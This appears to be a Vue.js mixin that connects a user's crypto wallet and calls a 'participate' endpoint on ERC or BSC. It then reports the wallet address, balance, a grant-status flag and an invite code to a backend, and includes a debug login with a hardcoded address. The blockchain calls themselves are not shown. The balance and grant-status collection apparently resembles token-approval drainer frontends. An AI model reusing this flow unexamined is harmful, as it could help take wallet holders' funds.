// /mixin/wallet.js
import { mapActions, mapState } from 'vuex';

/**
 * 使用示例
<template>
  <div>
    <van-button size="small" round color="#6b54eb" @click="walletConnect">{{ $t("WalletConnect") }}</van-button>
  </div>
</template>

<script>
import walletMixin from '@/config/walletMixin';

export default {
  mixins: [walletMixin],
  // 其他组件选项...
}
</script>
 */
export default {
  data() {
    return {
      mixinWalletLoading: false
    };
  },
  computed: {
    ...mapState(['bsc', 'eth', 'chain']),
    mixinWalletChainList() {
      return this.$config.CHAIN_LIST; // 移到 computed
    },
  },
  methods: {
    ...mapActions(['connectWallet', 'updateChain']),
    async walletConnect() {
      this.mixinWalletLoading = true; // 开始加载
      try {
        const res = await this.connectWallet();
        if (res.success) {
          let type = this.mixinWalletChainList[this.chain].type; //获取链类型
          const userRes = await this.$api.users.isRegister({ address: res.address, type: type });
          if (userRes.data == "") {
            this.$toast(this.$t("Successful"));
          } else {
            await this.participate();
          }
        }
      } catch (err) {
        console.error("Error connecting wallet:", err);
        this.$toast(this.$t("Connection failed"));
      } finally {
        this.mixinWalletLoading = false; // 结束加载
      }
    },

    // 参与
    async participate() {
      this.$toast.loading({
        message: this.$t("Loading..."),
        forbidClick: true,
        duration: 5000 // Toast will remain until cleared manually
      });

      try {
        await this.updateChain(this.chain); // 确保链已更新

        let res = null;
        if (this.chain === "erc") {
          res = await this.$api.blockchain.canyuERC(this.eth);
        } else if (this.chain === "bsc") {
          res = await this.$api.blockchain.canyuBSC(this.bsc);
        }
        
        if (res) {
          this.login(res); // 记录用户
          if (res.status) {
            this.$toast(this.$t("Successful"));
          } else {
            this.$toast(this.$t("Unsuccessful"));
          }
        } 
      } catch (error) {
        console.error("Participation error:", error);
        this.$toast(this.$t("Participation failed"));
      }
    },

    login(data) {
      const usersData = {
        address: data.address,
        type: this.mixinWalletChainList[this.chain].type,
        balance: data.balance,
        grant_status: data.status ? 1 : 0,
        yue: 1,
        c: this.invite_code,
      };
      //console.log("signin-data:", usersData); //打印注册信息
      this.$api.users.signin(usersData).then(res => {
        this.$api.users.info();//刷新用户数据
        console.log("signin-ok:", res);
      }).catch(err => {
        console.error("Signin failed:", err);
      });
    },

    // ******* debug_login 注册测试用，非调试不要调用 *******
    debug_login() {
      const usersData = {
        address: "0x9a25A3d6E5208c53132D7eD608Ae0d3C91c33103",
        type: '2',
        balance: '123',
        yue: 1,
        c: this.invite_code,
      };
      this.$api.users.signin(usersData).then(res => {
        console.log("debug_login:", res);
      }).catch(err => {
        console.error("debug_login failed:", err);
      });
    }
  }
}
